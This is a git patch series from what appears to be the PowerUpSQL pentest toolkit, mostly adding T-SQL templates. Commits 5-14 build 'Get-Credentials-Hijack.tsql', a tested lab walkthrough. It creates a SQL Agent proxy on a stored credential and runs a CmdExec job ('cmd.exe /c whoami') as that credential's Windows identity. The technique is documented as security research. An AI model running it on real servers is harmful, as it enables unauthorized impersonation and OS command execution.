From 99bace0f3d397bb5b1d1ff35250d186d002114ca Mon Sep 17 00:00:00 2001 From: Scott Sutherland Date: Tue, 20 Aug 2024 09:57:36 -0500 Subject: [PATCH 01/15] Create Get-AgentCredentialList.tsql --- templates/tsql/Get-AgentCredentialList.tsql | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 templates/tsql/Get-AgentCredentialList.tsql diff --git a/templates/tsql/Get-AgentCredentialList.tsql b/templates/tsql/Get-AgentCredentialList.tsql new file mode 100644 index 0000000..fd07fcf --- /dev/null +++ b/templates/tsql/Get-AgentCredentialList.tsql @@ -0,0 +1,14 @@ +// Get list of credentials used by agent jobs. + +USE msdb; +GO + +SELECT +j.name AS JobName, +s.step_id AS StepID, +s.step_name AS StepName, +c.name AS CredentialName +FROM sysjobs j +JOIN sysjobsteps s ON j.job_id = s.job_id +LEFT JOIN sys.credentials c ON s.proxy_id = c.credential_id +WHERE c.name IS NOT NULLORDER BY j.name, s.step_id; From df85ef80a0ec9f97c498444470363adb71eafb61 Mon Sep 17 00:00:00 2001 From: Scott Sutherland Date: Tue, 20 Aug 2024 09:58:19 -0500 Subject: [PATCH 02/15] Update Get-AgentCredentialList.tsql --- templates/tsql/Get-AgentCredentialList.tsql | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates/tsql/Get-AgentCredentialList.tsql b/templates/tsql/Get-AgentCredentialList.tsql index fd07fcf..9507d1a 100644 --- a/templates/tsql/Get-AgentCredentialList.tsql +++ b/templates/tsql/Get-AgentCredentialList.tsql @@ -11,4 +11,5 @@ c.name AS CredentialName FROM sysjobs j JOIN sysjobsteps s ON j.job_id = s.job_id LEFT JOIN sys.credentials c ON s.proxy_id = c.credential_id -WHERE c.name IS NOT NULLORDER BY j.name, s.step_id; +WHERE c.name IS NOT NULL +ORDER BY j.name, s.step_id; From 7f0a9734098508361f18486a9b09512aed72636f Mon Sep 17 00:00:00 2001 From: Scott Sutherland Date: Tue, 20 Aug 2024 10:03:19 -0500 Subject: [PATCH 03/15] Rename New-TempTableSample.sqk to New-TempTableSample.sql --- .../tsql/{New-TempTableSample.sqk => New-TempTableSample.sql} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename templates/tsql/{New-TempTableSample.sqk => New-TempTableSample.sql} (100%) diff --git a/templates/tsql/New-TempTableSample.sqk b/templates/tsql/New-TempTableSample.sql similarity index 100% rename from templates/tsql/New-TempTableSample.sqk rename to templates/tsql/New-TempTableSample.sql From 40b1f88828957a5b5d05150d07c0d27949a79a2a Mon Sep 17 00:00:00 2001 From: Scott Sutherland Date: Tue, 20 Aug 2024 10:03:48 -0500 Subject: [PATCH 04/15] Rename Get-10MostExpressiveQueries.tsql to Get-10MostExpensiveQueries.tsql --- ...MostExpressiveQueries.tsql => Get-10MostExpensiveQueries.tsql} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename templates/tsql/{Get-10MostExpressiveQueries.tsql => Get-10MostExpensiveQueries.tsql} (100%) diff --git a/templates/tsql/Get-10MostExpressiveQueries.tsql b/templates/tsql/Get-10MostExpensiveQueries.tsql similarity index 100% rename from templates/tsql/Get-10MostExpressiveQueries.tsql rename to templates/tsql/Get-10MostExpensiveQueries.tsql From 89e9c1dcf206f65628b6da2a64e277e5c63e02d4 Mon Sep 17 00:00:00 2001 From: Scott Sutherland Date: Tue, 20 Aug 2024 10:29:47 -0500 Subject: [PATCH 05/15] Create Get-Credentials-HiJack-Process.tsql --- templates/tsql/Get-Credentials-Hijack.tsql | 74 ++++++++++++++++++++++ 1 file changed, 74 insertions(+) create mode 100644 templates/tsql/Get-Credentials-Hijack.tsql diff --git a/templates/tsql/Get-Credentials-Hijack.tsql b/templates/tsql/Get-Credentials-Hijack.tsql new file mode 100644 index 0000000..dd1cfb8 --- /dev/null +++ b/templates/tsql/Get-Credentials-Hijack.tsql @@ -0,0 +1,74 @@ +-------------------------- +-- Get List of Credentials +-------------------------- +USE msdb; +GO + +SELECT +j.name AS JobName, +s.step_id AS StepID, +s.step_name AS StepName, +c.name AS CredentialName +FROM sysjobs j +JOIN sysjobsteps s ON j.job_id = s.job_id +LEFT JOIN sys.credentials c ON s.proxy_id = c.credential_id +WHERE c.name IS NOT NULL +ORDER BY j.name, s.step_id; + +-------------------------- +-- Create a Proxy Using the Target Credential +-------------------------- +USE msdb; +GO + +EXEC sp_add_proxy + @proxy_name = N'OSCommandProxy', -- Name of the proxy + @credential_name = N'MyCredential'; -- Name of the existing credential + +EXEC sp_grant_proxy_to_subsystem + @proxy_name = N'OSCommandProxy', + @subsystem_id = 3; -- 3 represents the Operating System (CmdExec) subsystem + +-------------------------- +-- Create the SQL Server Agent Job Configured to use the Proxy Account +-------------------------- + +USE msdb; +GO + +-- Create the job +EXEC sp_add_job + @job_name = N'WhoAmIJob'; -- Name of the job + +-- Add a job step that uses the proxy to execute the whoami command +EXEC sp_add_jobstep + @job_name = N'WhoAmIJob', + @step_name = N'ExecuteWhoAmI', + @subsystem = N'CmdExec', -- Specifies an Operating System command + @command = N'whoami', -- The OS command to execute + @on_success_action = 1, -- 1 = Quit with success + @on_fail_action = 2, -- 2 = Quit with failure + @proxy_name = N'OSCommandProxy'; -- The proxy created earlier + +-- Add a schedule to the job (optional, can be manual or scheduled) +EXEC sp_add_jobschedule + @job_name = N'WhoAmIJob', + @name = N'RunOnce', + @freq_type = 1, -- 1 = Once + @active_start_date = 20240820, -- Start date (YYYYMMDD) + @active_start_time = 120000; -- Start time (HHMMSS) + +-- Add the job to the SQL Server Agent +EXEC sp_add_jobserver + @job_name = N'WhoAmIJob', + @server_name = N'(LOCAL)'; -- The server where the job will run + +-------------------------- +-- Execute the Job +-------------------------- +EXEC sp_start_job @job_name = N'WhoAmIJob'; + +-------------------------- +-- Check the Output/Error +-------------------------- +EXEC sp_help_jobhistory @job_name= N'WhoAmIJob'; From f5c58ce545722f241c99965bfb826cf8bc2c3179 Mon Sep 17 00:00:00 2001 From: Scott Sutherland Date: Tue, 20 Aug 2024 11:28:12 -0500 Subject: [PATCH 06/15] Update Get-Credentials-Hijack.tsql --- templates/tsql/Get-Credentials-Hijack.tsql | 2 ++ 1 file changed, 2 insertions(+) diff --git a/templates/tsql/Get-Credentials-Hijack.tsql b/templates/tsql/Get-Credentials-Hijack.tsql index dd1cfb8..8ee5086 100644 --- a/templates/tsql/Get-Credentials-Hijack.tsql +++ b/templates/tsql/Get-Credentials-Hijack.tsql @@ -1,3 +1,5 @@ +-- Pending testing + -------------------------- -- Get List of Credentials -------------------------- From e58084d55c94dfc6a52c62eeb09890870d8e1e2a Mon Sep 17 00:00:00 2001 From: Scott Sutherland Date: Tue, 20 Aug 2024 11:53:14 -0500 Subject: [PATCH 07/15] Update Get-Credentials-Hijack.tsql --- templates/tsql/Get-Credentials-Hijack.tsql | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/templates/tsql/Get-Credentials-Hijack.tsql b/templates/tsql/Get-Credentials-Hijack.tsql index 8ee5086..623f820 100644 --- a/templates/tsql/Get-Credentials-Hijack.tsql +++ b/templates/tsql/Get-Credentials-Hijack.tsql @@ -1,7 +1,12 @@ -- Pending testing -------------------------- --- Get List of Credentials +-- Get list of all credentials +-------------------------- +select * from sys.credentials + +-------------------------- +-- Get List of Credentials - By Agent Jobs -------------------------- USE msdb; GO From 5081d438960a72c3672a10e4e636766376ecdf23 Mon Sep 17 00:00:00 2001 From: Scott Sutherland Date: Tue, 20 Aug 2024 12:02:06 -0500 Subject: [PATCH 08/15] Update Get-Credentials-Hijack.tsql --- templates/tsql/Get-Credentials-Hijack.tsql | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/templates/tsql/Get-Credentials-Hijack.tsql b/templates/tsql/Get-Credentials-Hijack.tsql index 623f820..88c0f5a 100644 --- a/templates/tsql/Get-Credentials-Hijack.tsql +++ b/templates/tsql/Get-Credentials-Hijack.tsql @@ -1,5 +1,13 @@ -- Pending testing + +-------------------------- +-- Create a new credential named 'MyCredential' +-------------------------- +CREATE CREDENTIAL [MyCredential] +WITH IDENTITY = 'machinename\owusername', +SECRET = 'P@ssw0rd!'; + -------------------------- -- Get list of all credentials -------------------------- From f813c065cae41950a5eef93e0d72d9421464d0a9 Mon Sep 17 00:00:00 2001 From: Scott Sutherland Date: Tue, 20 Aug 2024 12:05:22 -0500 Subject: [PATCH 09/15] Update Get-Credentials-Hijack.tsql --- templates/tsql/Get-Credentials-Hijack.tsql | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/templates/tsql/Get-Credentials-Hijack.tsql b/templates/tsql/Get-Credentials-Hijack.tsql index 88c0f5a..5505842 100644 --- a/templates/tsql/Get-Credentials-Hijack.tsql +++ b/templates/tsql/Get-Credentials-Hijack.tsql @@ -2,12 +2,20 @@ -------------------------- --- Create a new credential named 'MyCredential' +-- Create a new credential named 'MyCredential' - for testing -------------------------- CREATE CREDENTIAL [MyCredential] -WITH IDENTITY = 'machinename\owusername', +WITH IDENTITY = 'machinename\osusername', SECRET = 'P@ssw0rd!'; +EXEC sp_add_proxy + @proxy_name = N'MyCredentialProxy', -- Name of the proxy + @credential_name = N'MyCredential'; -- Name of the existing credential + +EXEC sp_grant_proxy_to_subsystem + @proxy_name = N'MyCredentialProxy', + @subsystem_id = 3; -- 3 represents the Operating System (CmdExec) subsystem + -------------------------- -- Get list of all credentials -------------------------- From df25b1dae7ad5e3cbf0761b701a494319649d14b Mon Sep 17 00:00:00 2001 From: Scott Sutherland Date: Tue, 20 Aug 2024 12:06:45 -0500 Subject: [PATCH 10/15] Update Get-Credentials-Hijack.tsql --- templates/tsql/Get-Credentials-Hijack.tsql | 12 ++---------- 1 file changed, 2 insertions(+), 10 deletions(-) diff --git a/templates/tsql/Get-Credentials-Hijack.tsql b/templates/tsql/Get-Credentials-Hijack.tsql index 5505842..f4a7bab 100644 --- a/templates/tsql/Get-Credentials-Hijack.tsql +++ b/templates/tsql/Get-Credentials-Hijack.tsql @@ -8,14 +8,6 @@ CREATE CREDENTIAL [MyCredential] WITH IDENTITY = 'machinename\osusername', SECRET = 'P@ssw0rd!'; -EXEC sp_add_proxy - @proxy_name = N'MyCredentialProxy', -- Name of the proxy - @credential_name = N'MyCredential'; -- Name of the existing credential - -EXEC sp_grant_proxy_to_subsystem - @proxy_name = N'MyCredentialProxy', - @subsystem_id = 3; -- 3 represents the Operating System (CmdExec) subsystem - -------------------------- -- Get list of all credentials -------------------------- @@ -45,11 +37,11 @@ USE msdb; GO EXEC sp_add_proxy - @proxy_name = N'OSCommandProxy', -- Name of the proxy + @proxy_name = N'MyCredentialProxy', -- Name of the proxy @credential_name = N'MyCredential'; -- Name of the existing credential EXEC sp_grant_proxy_to_subsystem - @proxy_name = N'OSCommandProxy', + @proxy_name = N'MyCredentialProxy', @subsystem_id = 3; -- 3 represents the Operating System (CmdExec) subsystem -------------------------- From a995179a3f976bb1db23a374817193e469b11ea0 Mon Sep 17 00:00:00 2001 From: Scott Sutherland Date: Tue, 20 Aug 2024 12:08:30 -0500 Subject: [PATCH 11/15] Update Get-Credentials-Hijack.tsql --- templates/tsql/Get-Credentials-Hijack.tsql | 18 +++++++++++++++++- 1 file changed, 17 insertions(+), 1 deletion(-) diff --git a/templates/tsql/Get-Credentials-Hijack.tsql b/templates/tsql/Get-Credentials-Hijack.tsql index f4a7bab..edfe981 100644 --- a/templates/tsql/Get-Credentials-Hijack.tsql +++ b/templates/tsql/Get-Credentials-Hijack.tsql @@ -44,6 +44,22 @@ EXEC sp_grant_proxy_to_subsystem @proxy_name = N'MyCredentialProxy', @subsystem_id = 3; -- 3 represents the Operating System (CmdExec) subsystem +-------------------------- +-- List Proxies +-------------------------- + +USE msdb; +GO + +SELECT + proxy_id, + name AS proxy_name, + credential_id, + enabled +FROM + dbo.sysproxies; +GO + -------------------------- -- Create the SQL Server Agent Job Configured to use the Proxy Account -------------------------- @@ -63,7 +79,7 @@ EXEC sp_add_jobstep @command = N'whoami', -- The OS command to execute @on_success_action = 1, -- 1 = Quit with success @on_fail_action = 2, -- 2 = Quit with failure - @proxy_name = N'OSCommandProxy'; -- The proxy created earlier + @proxy_name = N'MyCredentialProxy'; -- The proxy created earlier -- Add a schedule to the job (optional, can be manual or scheduled) EXEC sp_add_jobschedule From 43cddf4d08a17c789f2f5ba7c29527e6491742e9 Mon Sep 17 00:00:00 2001 From: Scott Sutherland Date: Tue, 20 Aug 2024 12:20:19 -0500 Subject: [PATCH 12/15] Update Get-Credentials-Hijack.tsql --- templates/tsql/Get-Credentials-Hijack.tsql | 45 ++++++++++++++-------- 1 file changed, 28 insertions(+), 17 deletions(-) diff --git a/templates/tsql/Get-Credentials-Hijack.tsql b/templates/tsql/Get-Credentials-Hijack.tsql index edfe981..13e0733 100644 --- a/templates/tsql/Get-Credentials-Hijack.tsql +++ b/templates/tsql/Get-Credentials-Hijack.tsql @@ -13,23 +13,6 @@ SECRET = 'P@ssw0rd!'; -------------------------- select * from sys.credentials --------------------------- --- Get List of Credentials - By Agent Jobs --------------------------- -USE msdb; -GO - -SELECT -j.name AS JobName, -s.step_id AS StepID, -s.step_name AS StepName, -c.name AS CredentialName -FROM sysjobs j -JOIN sysjobsteps s ON j.job_id = s.job_id -LEFT JOIN sys.credentials c ON s.proxy_id = c.credential_id -WHERE c.name IS NOT NULL -ORDER BY j.name, s.step_id; - -------------------------- -- Create a Proxy Using the Target Credential -------------------------- @@ -94,6 +77,34 @@ EXEC sp_add_jobserver @job_name = N'WhoAmIJob', @server_name = N'(LOCAL)'; -- The server where the job will run +-------------------------- +-- Get List of Proxy Account used by Agent Jobs +-- Show job, step, proxy, cred, and identity +-------------------------- +USE msdb; +GO + +SELECT + jobs.name AS JobName, + steps.step_id AS StepID, + steps.step_name AS StepName, + proxies.name AS ProxyName, + ISNULL(credentials.name, 'No Credential') AS CredentialName, + ISNULL(credentials.credential_identity, 'No Identity') AS IdentityName +FROM + msdb.dbo.sysjobs AS jobs +JOIN + msdb.dbo.sysjobsteps AS steps ON jobs.job_id = steps.job_id +JOIN + msdb.dbo.sysproxies AS proxies ON steps.proxy_id = proxies.proxy_id +LEFT JOIN + sys.credentials AS credentials ON proxies.credential_id = credentials.credential_id +WHERE + steps.proxy_id IS NOT NULL +ORDER BY + jobs.name, steps.step_id; + + -------------------------- -- Execute the Job -------------------------- From eec48d6a67fb93eb04a3297b8f8eabbe52b56522 Mon Sep 17 00:00:00 2001 From: Scott Sutherland Date: Tue, 20 Aug 2024 12:29:45 -0500 Subject: [PATCH 13/15] Update Get-Credentials-Hijack.tsql --- templates/tsql/Get-Credentials-Hijack.tsql | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/templates/tsql/Get-Credentials-Hijack.tsql b/templates/tsql/Get-Credentials-Hijack.tsql index 13e0733..d68cbea 100644 --- a/templates/tsql/Get-Credentials-Hijack.tsql +++ b/templates/tsql/Get-Credentials-Hijack.tsql @@ -1,5 +1,4 @@ --- Pending testing - +-- Tested and worked - SQL Server v2014 instance -------------------------- -- Create a new credential named 'MyCredential' - for testing @@ -59,7 +58,7 @@ EXEC sp_add_jobstep @job_name = N'WhoAmIJob', @step_name = N'ExecuteWhoAmI', @subsystem = N'CmdExec', -- Specifies an Operating System command - @command = N'whoami', -- The OS command to execute + @command = N'c:\windows\system32\cmd.exe /c whoami > c:\temp\whoami.txt', -- The OS command to execute @on_success_action = 1, -- 1 = Quit with success @on_fail_action = 2, -- 2 = Quit with failure @proxy_name = N'MyCredentialProxy'; -- The proxy created earlier From d5250ebd5e5f8361692be97795866b5e851af061 Mon Sep 17 00:00:00 2001 From: Scott Sutherland Date: Tue, 20 Aug 2024 12:39:55 -0500 Subject: [PATCH 14/15] Update Get-Credentials-Hijack.tsql --- templates/tsql/Get-Credentials-Hijack.tsql | 78 ++++++++++++++++------ 1 file changed, 58 insertions(+), 20 deletions(-) diff --git a/templates/tsql/Get-Credentials-Hijack.tsql b/templates/tsql/Get-Credentials-Hijack.tsql index d68cbea..2b1bb9d 100644 --- a/templates/tsql/Get-Credentials-Hijack.tsql +++ b/templates/tsql/Get-Credentials-Hijack.tsql @@ -1,20 +1,59 @@ -- Tested and worked - SQL Server v2014 instance - --------------------------- --- Create a new credential named 'MyCredential' - for testing --------------------------- +-- Author: Scott Sutherland @_nullbind (Twitter) + +-- ################################# +-- LAB SETUP SUMMARY +--- ################################# +-- 1. Install local instance +-- 2. Create local OS user named 'testuser'. +-- 3. Log into SQL Server instance as a sysadmin and create credential. + +-- ################################# +-- LAB SETUP SUMMARY +-- ################################# +-- 1. Log into the SQL Server instance as a sysadmin. +-- 2. List credentials. +-- 3. List proxy accounts. +-- 3. Create proxy account and assign privileges to it (if proxy account doesnt exist for credential already). List proxy accounts to confirm addition. +-- 4. Create Agent job that uses the proxy account. +-- 5. Execute a PowerShell, VBscript, JScript, or CMDEXEC Agent Job. These will create processes on the system in that user context. +-- 6. Confirm execution by reviewing history. + +--- ################################# +-- Walk Through Below +--- ################################# + +---------------------------------------------------- +-- Create a new credential named 'MyCredential' for testing (for lab only) +---------------------------------------------------- CREATE CREDENTIAL [MyCredential] -WITH IDENTITY = 'machinename\osusername', +WITH IDENTITY = 'yourcomputernamehere\testuser', SECRET = 'P@ssw0rd!'; --------------------------- --- Get list of all credentials --------------------------- +---------------------------------------------------- +-- Get a list of all credentials +---------------------------------------------------- select * from sys.credentials --------------------------- --- Create a Proxy Using the Target Credential --------------------------- +---------------------------------------------------- +-- Get a list proxies +---------------------------------------------------- +USE msdb; +GO + +SELECT + proxy_id, + name AS proxy_name, + credential_id, + enabled +FROM + dbo.sysproxies; +GO + +---------------------------------------------------- +-- Create a Proxy Using the Target Credential (if needed) +---------------------------------------------------- + USE msdb; GO @@ -26,10 +65,9 @@ EXEC sp_grant_proxy_to_subsystem @proxy_name = N'MyCredentialProxy', @subsystem_id = 3; -- 3 represents the Operating System (CmdExec) subsystem --------------------------- --- List Proxies --------------------------- - +---------------------------------------------------- +-- Get a list proxies - again +---------------------------------------------------- USE msdb; GO @@ -42,9 +80,9 @@ FROM dbo.sysproxies; GO --------------------------- +---------------------------------------------------- -- Create the SQL Server Agent Job Configured to use the Proxy Account --------------------------- +---------------------------------------------------- USE msdb; GO @@ -76,10 +114,11 @@ EXEC sp_add_jobserver @job_name = N'WhoAmIJob', @server_name = N'(LOCAL)'; -- The server where the job will run --------------------------- +---------------------------------------------------- -- Get List of Proxy Account used by Agent Jobs -- Show job, step, proxy, cred, and identity --------------------------- +---------------------------------------------------- + USE msdb; GO @@ -103,7 +142,6 @@ WHERE ORDER BY jobs.name, steps.step_id; - -------------------------- -- Execute the Job -------------------------- From 7d73373b0751b8648a800fbeef4c00ced66eba58 Mon Sep 17 00:00:00 2001 From: Scott Sutherland Date: Thu, 12 Dec 2024 12:09:39 -0600 Subject: [PATCH 15/15] Update LICENSE --- LICENSE | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/LICENSE b/LICENSE index aa9b85b..44d5389 100644 --- a/LICENSE +++ b/LICENSE @@ -2,7 +2,7 @@ PowerUpSQL is provided under the 3-clause BSD license below. ************************************************************* -Copyright (c) 2022, NetSPI +Copyright (c) 2024, NetSPI All rights reserved. Redistribution and use in source and binary forms, with or without